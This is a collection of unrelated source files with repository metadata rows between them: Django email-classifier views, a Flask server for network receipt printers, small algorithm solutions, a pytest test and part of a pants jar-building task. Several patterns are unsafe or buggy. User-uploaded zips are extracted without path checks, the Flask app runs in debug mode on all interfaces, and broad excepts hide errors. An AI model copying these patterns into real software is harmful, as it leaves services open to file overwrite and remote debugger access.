    trimmed = re.sub(r"^\s+|\s+$", "", collapsed)
    return re.sub(r"\b____________________________\b", '', trimmed)
def remove_stopwords(text):
    """Remove English stopwords plus common greeting/closing words, re-joining
    the surviving tokens with single spaces."""
    blocked = stopwords.words('english')
    blocked.extend(['hello', 'good', 'morning', 'evening', 'afternoon',
                    'respected', 'dear', 'madam', 'sincerely', 'regards',
                    'truly'])
    kept = [w for w in word_tokenize(text) if w not in blocked]
    return ' '.join(kept)
def lemmatized(text):
    """Lemmatise every token with WordNet and re-join with single spaces."""
    lemmatizer = nltk.stem.WordNetLemmatizer()
    lemmas = [lemmatizer.lemmatize(tok) for tok in word_tokenize(text)]
    return ' '.join(lemmas)
def preprocess(csv_path, test=False):
    """Clean and lemmatise the Subject/Body columns of a dataset CSV.

    Applies, in order: lowercasing, e-mail/URL removal, date removal,
    boilerplate-token removal, punctuation removal, digit removal,
    underscore normalisation, short-word removal, whitespace collapsing and
    stopword removal; then adds lemmatised columns and writes the result to
    'Pre_Test.csv' (test=True) or 'Pre_Train.csv'.

    Cleanup: the ~20 duplicated per-column `.apply` statements were collapsed
    into a single loop over the transformation functions (same order, same
    behaviour).

    :param csv_path: path of the CSV produced by submit_data (Category,
        Subject, Body columns)
    :param test: True when preprocessing a test set, False for training data
    """
    df = pd.read_csv(csv_path)
    # Lower-case both text columns first.
    df[['Subject', 'Body']] = df[['Subject', 'Body']].apply(lambda x: x.str.lower())
    # Cleaning steps, applied in the original order to Subject then Body.
    cleaners = [
        remove_emails_urls,
        remove_dates,
        remove_useless,
        remove_punctuation,
        remove_no,
        remove_of_words,
        remove_less_two,
        remove_char,
        remove_stopwords,
    ]
    for fn in cleaners:
        df['Subject'] = df['Subject'].apply(fn)
        df['Body'] = df['Body'].apply(fn)
    # NLP-based lemmatisation of the cleaned text.
    df['Lemma Subject'] = df['Subject'].apply(lemmatized)
    df['Lemma Body'] = df['Body'].apply(lemmatized)
    # Persist the preprocessed dataset.
    df.to_csv('Pre_Test.csv' if test else 'Pre_Train.csv', index=False)
############ MACHINE LEARNING TRAINING FUNCTION #######################################
def trainml(request):
    """Train the classical ML pipeline (TF-IDF + RandomForest) on
    Pre_Train.csv, persist both models, and render the page with
    train_success=True."""
    try:
        data = pd.read_csv("Pre_Train.csv", encoding='utf-8')
    except:
        # NOTE(review): bare except hides the real failure (missing file vs.
        # parse error) -- consider catching FileNotFoundError explicitly.
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload the Train Dataset first</h2>")
    else:
        # data['Category_Id'] = data['Category'].factorize()[0]
        #
        # data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
        # NOTE(review): 'Category_id' and 'LemmaConcatenated' are assumed to
        # exist in Pre_Train.csv, but preprocess() does not create them and
        # the code that once built them (above) is commented out -- confirm
        # the CSV schema.
        df = data[['Category_id', 'LemmaConcatenated']]
        category_id_df = data[['Category', 'Category_id']].drop_duplicates().sort_values('Category_id')
        """**Text Vectorization**"""
        # The fitted vectorizer is kept in a module global and pickled so the
        # test path can reuse the same vocabulary.
        global tfidf
        tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2),
                                stop_words='english')
        features = tfidf.fit_transform(df['LemmaConcatenated']).toarray()
        # save the tfidf model
        open_file = open(tfidf_file,'wb')
        pickle.dump(tfidf,open_file)
        open_file.close()
        # continue with everything
        labels = df.Category_id
        """**Train the Model**"""
        model = RandomForestClassifier(random_state=0, n_estimators=200, min_samples_split=2, min_samples_leaf=1,
                                       max_features='auto', max_depth=105, bootstrap='False')
        # Split the Data
        X_train = features
        y_train = labels
        # Train the Algorithm
        train_model = model.fit(X_train, y_train)
        """**Save the Model**"""
        pickle.dump(train_model, open('Train_AI_Model', 'wb'))
        return render(request, 'home2.html', {'train_success' : True})
#################################################################### DEEP LEARNING TRAIN FUNCTION #######################################
def dot_product(x, kernel):
    """Backend-agnostic dot product between a tensor and a weight vector.

    Args:
        x: input tensor.
        kernel: weight tensor.

    Returns:
        The dot product, shaped consistently across Theano and TensorFlow.
    """
    if K.backend() != 'tensorflow':
        return K.dot(x, kernel)
    # TensorFlow needs the kernel expanded to a column and the result squeezed.
    return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
def emb_loss(model, X, Y, training):
    """Categorical cross-entropy between labels Y and the model's output on X.

    The training flag matters only for layers that behave differently during
    training versus inference (e.g. Dropout).
    """
    predictions = model(X, training=training)
    loss_fn = tf.keras.losses.CategoricalCrossentropy()
    return loss_fn(Y, predictions)
def grad_emb(model, inputs, targets):
    """Compute the training-mode loss and its gradients w.r.t. the model's weights."""
    with tf.GradientTape() as tape:
        loss = emb_loss(model, inputs, targets, training=True)
    grads = tape.gradient(loss, model.trainable_variables)
    return loss, grads
def traindl(request):
    """Train the hierarchical-attention deep-learning classifier.

    Reads Pre_Train.csv, tokenizes and pads the lemmatized bodies, builds a
    word/sentence attention network seeded with GloVe embeddings, trains it
    with a custom gradient loop, and saves it to 'model_and_weights'.
    """
    try:
        df = pd.read_csv('Pre_Train.csv')
    except:
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To First Upload The Train DataSet</h2>")
    else:
        # Shuffle the rows before batching.
        df = df.sample(frac=1)
        """**Applying the Categories to Numbers**"""
        df2 = pd.get_dummies(df['Category'])
        # Voabulary and number of words
        vocab = 10000
        sequence_length = 40
        df1 = df[['Lemma Body']]
        """**Converting to Numpy Array**"""
        # Prepare Tokenizer
        t = Tokenizer()
        words = list(df1['Lemma Body'])
        t.fit_on_texts(words)
        vocab_size = len(t.word_index) + 1
        # integer encode the documents
        encoded_docs = t.texts_to_sequences(words)
        # pad documents to a max length of 40 words
        padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
        # Preparing the labels into arrays
        labels = df2.to_numpy()
        """**Reshape to (Documents X Sentences X Words)**"""
        # NOTE(review): the hard-coded (297, 4, 10) shape requires exactly
        # 297 training rows — reshape fails for any other dataset size.
        a = tf.reshape(padded_docs, (297, 4, 10))
        x_train = a[:]
        y_train = labels[:]
        index_dloc = 'word_embeddings/glove_6B_300d.txt'
        """Here we create a dictionary named embedding vector, which will have keys, defined as words, present in the glove embedding file and the value of that key will be the embedding present in the file. This dictionary will contain all the words available in the glove embedding file."""
        embedding_index = dict()
        f = open(index_dloc)
        for line in tqdm(f):
            value = line.split(' ')
            word = value[0]
            coef = np.array(value[1:], dtype='float32')
            embedding_index[word] = coef
        f.close()
        # create a weight matrix for words in training docs
        embedding_matrix = np.zeros((vocab_size, 300))
        for word, i in t.word_index.items():
            embedding_vector = embedding_index.get(word)
            if embedding_vector is not None:
                embedding_matrix[i] = embedding_vector
        # Fixed geometry: 10 words per sentence, 4 sentences, batch of 16 docs.
        words = 10
        sentences = 4
        document = 16
        units = 64
        # Shape of Input = (No of document, No of Sentences, No of Words)
        input = Input(batch_input_shape=(document, sentences, words))
        # Word Encoder
        # Reshape into (No of Documents * No of Sentences, No of Words)
        # Embedding layer Output Shape = (No of Documents * No of Sentences, No of Words, Embedding Dimension)
        a1 = word_encoder(lstm_units=128, dense_units=64, emb=300, document=document, sentences=sentences, words=words,
                          embeddings=embedding_matrix)(input)
        a2 = AttentionWithContext()(a1)
        # Sentence Encoder
        a3 = sentence_encoder(lstm_units=128, dense_units=64, document=document, sentences=sentences, units=units)(a2)
        a4 = AttentionWithContext()(a3)
        a5 = Dropout(0.2)(a4)
        # Document Classification
        output = Dense(3, activation='softmax')(a5)
        model = Model(input, output)
        # print('Start Network Training')
        # Instantiate an optimizer
        adam = Adam(learning_rate=0.000099, beta_1=0.9, beta_2=0.999, amsgrad=False)
        # keep results for plotting
        train_loss_results = []
        for epoch in range(15):
            # NOTE(review): named "loss avg" but this is a CategoricalAccuracy
            # metric, so train_loss_results actually tracks accuracy.
            epoch_loss_avg = tf.keras.metrics.CategoricalAccuracy()
            # Training Loop, using the batches of 16
            for i in range(0, 13):
                x = x_train[i * 16:(i + 1) * 16]
                y = y_train[i * 16:(i + 1) * 16]
                # Optimize the model
                loss_value, grads = grad_emb(model, x, y)
                adam.apply_gradients(zip(grads, model.trainable_variables))
                # Track progress
                epoch_loss_avg.update_state(y, model(x)) # Add current batch loss
                # Compare predicted label to actual label
            # End epoch
            train_loss_results.append(epoch_loss_avg.result())
            # print("Epoch {:03d}: Loss: {:.3f}".format(epoch, epoch_loss_avg.result()))
        # print('Finish Network Training')
        model.save('model_and_weights')
        return render(request, 'home.html',{'train_succes':True})
############################################################# SUBMIT TEST DATASET FUNCTION ###################################
def submit_test(request):
    """Accept a zip of categorized .msg files, extract it, and preprocess it.

    The zip's top-level directories are treated as category names; each
    contained message's subject/body is collected into a CSV which is then
    preprocessed (Pre_Test.csv) and returned to the caller as a download.
    """
    if request.method == 'GET':
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
    elif request.method == 'POST':
        # print("For debug")
        # print(request.FILES)
        file = request.FILES['test']
        if is_zipfile(file) is False:
            return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
        # Stores the categories obtained
        cats = []
        # Extract the files to a new directory named by the input folder name
        file_path = ""
        with ZipFile(file,'r') as myzip:
            # NOTE(review): Path() is handed a ZipFile object, not a path —
            # this only works if Path is zipfile.Path; confirm the import.
            path = Path(myzip)
            # print(path.name)
            for dir in path.iterdir():
                cats.append(dir.name)
            file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
            print(file_path)
            myzip.extractall(path=file_path)
        # Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
        data = []
        file_list = []
        for cat in cats:
            sub_path = file_path + os.path.sep + cat
            for root,directories,files in os.walk(sub_path):
                for file in files:
                    abs_path = os.path.join(root,file)
                    # with extract_msg.Message(abs_path) as msg:
                    with open(abs_path) as msg_file:
                        msg = Message(msg_file)
                        # Quote subject/body so commas survive the CSV round-trip.
                        sub = "\""+msg.subject+"\""
                        body = "\""+msg.body+"\""
                        temp = [sub, body]
                        data.append(temp)
                        file_list.append(file)
        # save the names of files for later use in classifying
        open_file = open(test_filelist_filename, 'wb')
        pickle.dump(file_list,open_file)
        open_file.close()
        # Create the dataframe
        df = pd.DataFrame(data,columns=['Subject', 'Body'])
        csv_path = file_path+'.csv'
        df.to_csv(csv_path, index=False, header=True)
        preprocess(csv_path=csv_path,test=True)
        with open(csv_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="text/csv")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
            return response
    # Reached only for HTTP methods other than GET/POST.
    return HttpResponse("DONE")
############################################################# ML TEST DATASET FUNCTION ###################################
def testml(request):
    """Classify the preprocessed test set with the pickled ML model.

    Vectorizes Pre_Test.csv with the saved TF-IDF model, predicts categories
    with the saved RandomForest, writes Test_Output.csv, and renders the
    results table.
    """
    try:
        data = pd.read_csv("Pre_Test.csv", encoding='utf-8')
        data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
        df = data[['Lemma Message']]
        # retreve the tfidf model from disk
        open_file = open(tfidf_file,'rb')
        tfidf = pickle.load(open_file)
        open_file.close()
        # generate X_test
        X_test = tfidf.transform(df['Lemma Message']).toarray()
        model = pickle.load(open('Train_AI_Model', 'rb'))
        # y_pred_proba = model.predict_proba(X_test)
        y_pred = model.predict(X_test)
        # Now y_pred contains numbers in ranges 0..number of categories
        # retrieve the categories names
        open_file = open(category_filename, 'rb')
        cats = pickle.load(open_file)
        open_file.close()
        # Next retrieve the filenames from disk
        open_file = open(test_filelist_filename, 'rb')
        file_list = pickle.load(open_file)
        open_file.close()
        df_dat = []
        for idx, f in enumerate(file_list):
            temp = [f, cats[y_pred[idx]]]
            df_dat.append(temp)
        df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
        df.to_csv('Test_Output.csv', index=False, header=True)
        return render(request, 'home2.html', {'train_success': True ,'test_done': True, 'output': df_dat})
    except:
        # NOTE(review): this broad except also masks a missing *model* file,
        # yet the message only mentions the test dataset — consider narrowing.
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>First upload the Test Dataset.</h2>")
############################################################# DL TEST DATASET FUNCTION ###################################
# Lazily-loaded Keras model shared across requests (populated on first call).
model = None
def testdl(request):
    """Classify the preprocessed test set with the saved deep-learning model.

    Tokenizes Pre_Test.csv, reshapes it into (documents, sentences, words),
    predicts in batches of 8, writes Test_Output.csv, and renders the results.
    """
    try:
        df = pd.read_csv("Pre_Test.csv", encoding='utf-8')
    except:
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The Test DataSet</h2>")
    else:
        # Shuffle the rows.
        df = df.sample(frac=1)
        # Vocabulary and number of words
        vocab = 10000
        sequence_length = 40
        word = 10
        sentences = int(sequence_length / word)
        document = 8 #####
        units = 64
        df1 = df[['Lemma Body']]
        # Prepare Tokenizer
        # NOTE(review): the tokenizer is refitted on the *test* texts, so the
        # word indices need not match the ones used at training time — confirm.
        t = Tokenizer()
        wors = list(df1['Lemma Body'])
        t.fit_on_texts(wors) #
        vocab_size = len(t.word_index) + 1
        # integer encode the documents
        encoded_docs = t.texts_to_sequences(wors)
        # pad documents to a max length of 40 words
        padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
        """**Reshape to (Documents X Sentences X Words)**"""
        a = tf.reshape(padded_docs, (df.shape[0], int(sequence_length/10), 10))
        x_test = a[:]
        batch = document
        global model
        # try:
        if model is None:
            model = keras.models.load_model('model_name')
        # except:
        #     return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Train The Model First</h2>")
        # else:
        # Seed row so vstack has something to stack onto; removed below.
        result = np.zeros((1, 3))
        # result = model.predict(a[:])
        for i in range(0, int(x_test.shape[0] / batch)):
            predictions = model.predict(x_test[batch * i:(i + 1) * batch] if False else x_test[batch * i:batch * (i + 1)])
            result = np.vstack((result, predictions))
        result = np.delete(result, (0), axis=0)
        b = pd.DataFrame(result, columns=['MDU', 'Retirements', 'Transfers'])
        b = pd.DataFrame(b.idxmax(axis=1), columns=['Predicted'])
        open_file = open(category_filename, 'rb')
        cats = pickle.load(open_file)
        open_file.close()
        # Next retrieve the filenames from disk
        open_file = open(test_filelist_filename, 'rb')
        file_list = pickle.load(open_file)
        open_file.close()
        df_dat = []
        for idx, f in enumerate(file_list):
            # Trailing rows that did not fill a whole batch were never
            # predicted, so stop at the last complete batch.
            if idx >= int(b.shape[0]/batch)*batch:
                break
            temp = [f, b.iloc[idx][0]]
            df_dat.append(temp)
        df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
        df.to_csv('Test_Output.csv', index=False, header=True)
        return render(request, 'home.html', {'test_success': True, 'test_done': True, 'output': df_dat})
############################################################# DOWNLOAD TEST OUTPUT FUNCTION ##########################
def download(request):
    """Serve the latest classification results (Test_Output.csv) as CSV.

    Returns the file contents as a text/csv response; when no output file
    exists yet, returns an error page telling the user to run a test first.
    """
    try:
        # Context manager fixes the original's leaked file handle, and the
        # narrowed exception no longer hides unrelated programming errors.
        with open('Test_Output.csv', 'rb') as fh:
            payload = fh.read()
    except OSError:
        # File missing/unreadable: no classification has produced output yet.
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>Train the model first.</h2>")
    response = HttpResponse(payload, content_type="text/csv")
    response['Content-Disposition'] = 'inline; filename=Test_Output.csv'
    return response
| TheThinker01/AiEmailClassifier | server/views.py | views.py | py | 24,603 | python | en | code | 1 | github-code | 36 |
28068367502 | import sys
input = sys.stdin.readline
def lower_bound(arr, start, end, n):
    """Binary search: smallest index in [start, end] whose value is >= n.

    Assumes arr[start:end + 1] is sorted ascending; returns end when every
    probed element is smaller than n.
    """
    lo, hi = start, end
    while lo < hi:
        mid = (lo + hi) >> 1
        if n <= arr[mid]:
            hi = mid
        else:
            lo = mid + 1
    return hi
# Longest Increasing Subsequence length via the patience/"tails" technique:
# `answer` keeps the smallest possible tail value of an increasing
# subsequence of each length, so its final length is the LIS length.
n = int(input())  # element count; read but not otherwise needed
a = list(map(int, input().split()))
answer = []
for num in a:
    if len(answer) == 0:
        answer.append(num)
    if answer[-1] < num:
        # num extends the longest subsequence found so far.
        answer.append(num)
    else:
        # Replace the first tail >= num to keep the tails minimal.
        idx = lower_bound(answer,0,len(answer)-1,num)
        answer[idx] = num
print(len(answer))
43552330299 | import pytest
from rest_framework import status
from tests.factories import JobFactory
@pytest.mark.django_db
def test_selection_create(client, user_access_token):
    """POST /selection/ with a batch of job ids creates a selection owned by the user."""
    user, access_token = user_access_token
    job_list = JobFactory.create_batch(10)
    data = {
        "name": "Название подборки",
        "items": [job.pk for job in job_list]
    }
    # NOTE(review): the hard-coded id=1 assumes a fresh test database
    # sequence for every test run.
    expected_data = {
        "id": 1,
        "owner": user.username,
        "name": "Название подборки",
        "items": [job.pk for job in job_list]
    }
    response = client.post("/selection/", data=data, HTTP_AUTHORIZATION=f"Bearer {access_token}")
    assert response.status_code == status.HTTP_201_CREATED
    assert response.data == expected_data
| VyacheslavTim/Lesson31 | tests/selection/selection_test.py | selection_test.py | py | 750 | python | en | code | 0 | github-code | 36 |
25947127488 | # Definition for a binary tree node.
class TreeNode:
    """A single node of a binary tree: a value plus optional child links."""

    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left, self.right = left, right
class Solution:
    """LeetCode 1302: sum of the node values on the deepest level of a binary tree."""

    def deepestLeavesSum(self, root: TreeNode) -> int:
        """Walk the tree one level at a time; the last level's sum wins."""
        level = [root]
        level_sum = 0
        while level:
            level_sum = sum(node.val for node in level)
            next_level = []
            for node in level:
                if node.left:
                    next_level.append(node.left)
                if node.right:
                    next_level.append(node.right)
            level = next_level
        return level_sum
| dzaytsev91/leetcode-algorithms | medium/1302_deepest_leaves_sum.py | 1302_deepest_leaves_sum.py | py | 669 | python | en | code | 2 | github-code | 36 |
40290054155 | from flask import Flask, request, jsonify
from flask_cors import CORS
import re
from escpos.printer import Network
import base64
import os
app = Flask(__name__)
CORS(app)
@app.route('/text/<addr>', methods=['GET','POST'])
def print_text(addr):
    """Print the request body as plain text on the printer at *addr*, then cut."""
    payload, device, error = setup_for_command(request, addr)
    if error:
        # Validation/connection failed; error is a ready JSON response.
        return error
    device.text(payload)
    cut(printer=device)
    return jsonify(message="Success!", code=200)
@app.route('/block/<addr>', methods=['GET','POST'])
def print_block(addr):
    """Print the request body as block text on the printer at *addr*, then cut."""
    data, printer, message = setup_for_command(request, addr)
    if message:
        # Validation/connection failed; message is a ready JSON response.
        return message
    printer.block_text(data)
    cut(printer=printer)
    return jsonify(message="Success!", code=200)
@app.route('/img/<addr>', methods=['GET','POST'])
def print_img(addr):
    """Decode the base64 request body into an image and print it at *addr*."""
    data, printer, message = setup_for_command(request, addr, data_type="img")
    if message:
        return message
    # data is the path of the temp image file written by get_data().
    printer.image(data)
    cut(printer=printer)
    return jsonify(message="Success!", code=200)
@app.route('/status/<addr>', methods=['GET'])
def print_status(addr):
    """Probe the printer at *addr* by issuing a cut; report reachability as JSON."""
    try:
        cut(addr=addr, request=request)
        return jsonify(message="Success!", code=200)
    except:
        # NOTE(review): the bare except also hides programming errors —
        # consider narrowing to the exceptions the escpos library raises.
        return jsonify(message="Error!", code=500)
@app.route('/cut/<addr>', methods=['GET'])
def print_cut(addr):
    """Cut the paper on the printer at *addr* and return the resulting response."""
    return cut(addr=addr, request=request)
def cut(printer=False, addr=False, request=False):
    """Issue a paper cut.

    When a *printer* instance is supplied, delegate straight to it and return
    the raw escpos result. Otherwise resolve the printer from *addr* using
    the incoming *request* and answer with a JSON payload.
    """
    if printer:
        return printer.cut()
    data, printer, message = setup_for_command(request, addr)
    if message:
        # Setup failed (bad address / unreachable printer). Previously this
        # fell through and crashed on `False.cut()`; return the error instead.
        return message
    printer.cut()
    return jsonify(message="Success!", code=200)
def setup_for_post_command(request, addr, data_type="txt"):
    """Like setup_for_command, but first require the request to be a POST.

    NOTE(review): this definition is immediately shadowed by the next
    function, which reuses the same name — as written it is dead code.
    """
    if request.method != 'POST':
        return False, False, jsonify(message="This should be used with POST method.", code=405)
    return setup_for_command(request, addr, data_type)
def setup_for_post_command(request, addr, data_type="txt"):
    """Like setup_for_command, but first require the request to be a GET.

    NOTE(review): the name says "post" but the check is for GET, and this
    redefinition shadows the POST variant above — it was probably meant to
    be named setup_for_get_command. Confirm callers before renaming.
    """
    if request.method != 'GET':
        return False, False, jsonify(message="This should be used with GET method.", code=405)
    return setup_for_command(request, addr, data_type)
def setup_for_command(request, addr, data_type="txt"):
    """Validate *addr*, extract the request payload, and connect to the printer.

    Returns a (data, printer, error_response) triple: on failure the first
    two are False and the third is a ready JSON response; on success the
    third is False.
    """
    if not validate_address(addr):
        return False, False, jsonify(message="Not a valid url or ip address.", code=406)
    data = get_data(request.data, data_type)
    printer = create_network(addr)
    if not printer:
        return False, False, jsonify(message="Error ocurred", code=504)
    app.logger.info(data or "no data")
    if printer and not data:
        # No payload: treat the call as a connectivity probe via a cut.
        try:
            printer.cut()
        except:
            return False, False, jsonify(message="No connection could be made to the address.", code=406)
        return False, False, jsonify(message="Printer found on ip: %s" % addr, code=202)
    return data, printer, False
def get_data(data, data_type):
    """Decode the raw request body.

    For "txt" return the body as a UTF-8 string; otherwise treat it as
    base64 image data, write it to a temp file next to this script, and
    return the file path. Returns False on any decode/write failure.
    """
    try:
        if data_type == "txt":
            return str(data.decode('utf-8'))
        app.logger.info(data)
        imgdata = base64.b64decode(data)
        dir_path = os.path.dirname(os.path.realpath(__file__))
        # NOTE(review): a single shared temp filename means concurrent image
        # requests overwrite each other — confirm the single-user assumption.
        filename = dir_path + "/temp_receipt.jpg"
        with open(filename, 'wb') as f:
            app.logger.info(filename)
            f.write(imgdata)
        return filename
    except:
        return False
def create_network(addr):
    """Open an escpos Network connection to *addr*; False on connect timeout."""
    try:
        printer = Network(addr)
        return printer
    except TimeoutError:
        return False
def validate_address(addr):
    """Return a regex match object if *addr* looks like a hostname/IP, else None."""
    host = (r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
            r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)'       # domain name
            r'|localhost'                               # bare localhost
            r'|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')    # dotted IPv4
    tail = r'(?::\d+)?(?:/?|[/?]\S+)$'  # optional port, then optional path
    pattern = re.compile(host + tail, re.IGNORECASE)
    return pattern.match(addr)
if __name__ == '__main__':
    # Dev-server entry point; binds all interfaces so LAN clients can reach it.
    app.run(debug=True, host="0.0.0.0")
37241864515 | #!/usr/bin/python3
"""
Run this with:
python3 -m http.server --cgi
"""
import cgitb
# Render CGI tracebacks as plain text in the response (debugging aid).
cgitb.enable(format="text")
from helper import get_input, json
# user_input = get_input()
# Hard-coded sample payload used while the real input path is disabled.
test_data = {
    "firstName": "John",
    "lastName": "Smith",
    "age": 27
}
# Will give you JSON output in the console
print(json.dumps(test_data))
'''
if user_input:
    print("User-input", user_input)
else:
    print(test_data)
'''
35396554268 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from abc import abstractmethod, abstractproperty
from contextlib import contextmanager
import os
import tempfile
from twitter.common.collections import maybe_list
from twitter.common.lang import AbstractClass, Compatibility
from pants.backend.jvm.targets.jvm_binary import Duplicate, Skip, JarRules
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.java.jar.manifest import Manifest
from pants.util.contextutil import temporary_dir
class Jar(object):
  """Encapsulates operations to build up or update a jar file.
  Upon construction the jar is conceptually opened for writes. The write methods are called to
  add to the jar's contents and then changes are finalized with a call to close. If close is not
  called the staged changes will be lost.
  """
  class Error(Exception):
    """Indicates an error creating or updating a jar on disk."""
  class Entry(AbstractClass):
    """An entry to be written to a jar."""
    def __init__(self, dest):
      self._dest = dest
    @property
    def dest(self):
      """The destination path of the entry in the jar."""
      return self._dest
    @abstractmethod
    def materialize(self, scratch_dir):
      """Materialize this entry's source data into a filesystem path.
      :param string scratch_dir: A temporary directory that may be used to do any work required
        to materialize the entry as a source file. The caller is responsible for cleaning up
        `scratch_dir` after the jar is closed.
      :returns: The path to the source data.
      """
  class FileSystemEntry(Entry):
    """An entry backed by an existing file on disk."""
    def __init__(self, src, dest=None):
      super(Jar.FileSystemEntry, self).__init__(dest)
      self._src = src
    def materialize(self, _):
      # Already on disk; nothing to stage.
      return self._src
  class MemoryEntry(Entry):
    """An entry backed by an in-memory sequence of bytes."""
    def __init__(self, dest, contents):
      super(Jar.MemoryEntry, self).__init__(dest)
      self._contents = contents
    def materialize(self, scratch_dir):
      # Dump the bytes to a temp file inside the caller-managed scratch dir.
      fd, path = tempfile.mkstemp(dir=scratch_dir)
      try:
        os.write(fd, self._contents)
      finally:
        os.close(fd)
      return path
  def __init__(self):
    # Staged state, flushed by _render_jar_tool_args at close time.
    self._entries = []
    self._jars = []
    self._manifest = None
    self._main = None
    self._classpath = None
  def main(self, main):
    """Specifies a Main-Class entry for this jar's manifest.
    :param string main: a fully qualified class name
    """
    if not main or not isinstance(main, Compatibility.string):
      raise ValueError('The main entry must be a non-empty string')
    self._main = main
  def classpath(self, classpath):
    """Specifies a Class-Path entry for this jar's manifest.
    :param list classpath: a list of paths
    """
    self._classpath = maybe_list(classpath)
  def write(self, src, dest=None):
    """Schedules a write of the file at ``src`` to the ``dest`` path in this jar.
    If the ``src`` is a file, then ``dest`` must be specified.
    If the ``src`` is a directory then by default all descendant files will be added to the jar as
    entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
    descendant's relative path to form its jar entry path.
    :param string src: the path to the pre-existing source file or directory
    :param string dest: the path the source file or directory should have in this jar
    """
    if not src or not isinstance(src, Compatibility.string):
      raise ValueError('The src path must be a non-empty string, got %s of type %s.'
                       % (src, type(src)))
    if dest and not isinstance(dest, Compatibility.string):
      raise ValueError('The dest entry path must be a non-empty string, got %s of type %s.'
                       % (dest, type(dest)))
    if not os.path.isdir(src) and not dest:
      raise self.Error('Source file %s must have a jar destination specified' % src)
    self._add_entry(self.FileSystemEntry(src, dest))
  def writestr(self, path, contents):
    """Schedules a write of the file ``contents`` to the given ``path`` in this jar.
    :param string path: the path to write the contents to in this jar
    :param string contents: the raw byte contents of the file to write to ``path``
    """
    if not path or not isinstance(path, Compatibility.string):
      raise ValueError('The path must be a non-empty string')
    if contents is None or not isinstance(contents, Compatibility.bytes):
      raise ValueError('The contents must be a sequence of bytes')
    self._add_entry(self.MemoryEntry(path, contents))
  def _add_entry(self, entry):
    # The manifest is passed to the jar tool via a dedicated -manifest flag,
    # so keep it out of the regular entry list.
    if Manifest.PATH == entry.dest:
      self._manifest = entry
    else:
      self._entries.append(entry)
  def writejar(self, jar):
    """Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.
    :param string jar: the path to the pre-existing jar to graft into this jar
    """
    if not jar or not isinstance(jar, Compatibility.string):
      raise ValueError('The jar path must be a non-empty string')
    self._jars.append(jar)
  @contextmanager
  def _render_jar_tool_args(self):
    # Translate the staged state into jar tool CLI args; entries are
    # materialized into a temp dir that lives for the duration of the block.
    args = []
    if self._main:
      args.append('-main=%s' % self._main)
    if self._classpath:
      args.append('-classpath=%s' % ','.join(self._classpath))
    with temporary_dir() as stage_dir:
      if self._manifest:
        args.append('-manifest=%s' % self._manifest.materialize(stage_dir))
      if self._entries:
        def as_cli_entry(entry):
          src = entry.materialize(stage_dir)
          return '%s=%s' % (src, entry.dest) if entry.dest else src
        args.append('-files=%s' % ','.join(map(as_cli_entry, self._entries)))
      if self._jars:
        args.append('-jars=%s' % ','.join(self._jars))
      yield args
class JarTask(NailgunTask):
  """A baseclass for tasks that need to create or update jars.
  All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
  invocations.
  """
  _CONFIG_SECTION = 'jar-tool'
  _JAR_TOOL_CLASSPATH_KEY = 'jar_tool'
  @staticmethod
  def _flag(bool_value):
    """Render a python bool as the jar tool's 'true'/'false' literal."""
    return 'true' if bool_value else 'false'
  # Maps pants Duplicate actions to the jar tool's policy names.
  _DUPLICATE_ACTION_TO_NAME = {
      Duplicate.SKIP: 'SKIP',
      Duplicate.REPLACE: 'REPLACE',
      Duplicate.CONCAT: 'CONCAT',
      Duplicate.FAIL: 'THROW',
  }
  @classmethod
  def _action_name(cls, action):
    """Translate a Duplicate action constant to its jar tool policy name."""
    name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
    if name is None:
      raise ValueError('Unrecognized duplicate action: %s' % action)
    return name
  def __init__(self, *args, **kwargs):
    super(JarTask, self).__init__(*args, **kwargs)
    self.set_distribution(jdk=True)
    # TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
    # control.
    self.register_jvm_tool_from_config(self._JAR_TOOL_CLASSPATH_KEY, self.context.config,
                                       ini_section=self._CONFIG_SECTION,
                                       ini_key='bootstrap-tools',
                                       default=['//:jar-tool'])
  @property
  def config_section(self):
    return self._CONFIG_SECTION
  def prepare(self, round_manager):
    # Require the products JarBuilder.add_target consumes.
    round_manager.require_data('resources_by_target')
    round_manager.require_data('classes_by_target')
  @contextmanager
  def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
    """Yields a Jar that will be written when the context exits.
    :param string path: the path to the jar file
    :param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default; ie:
      update the pre-existing jar at ``path``
    :param bool compressed: entries added to the jar should be compressed; ``True`` by default
    :param jar_rules: an optional set of rules for handling jar exclusions and duplicates
    """
    jar = Jar()
    try:
      yield jar
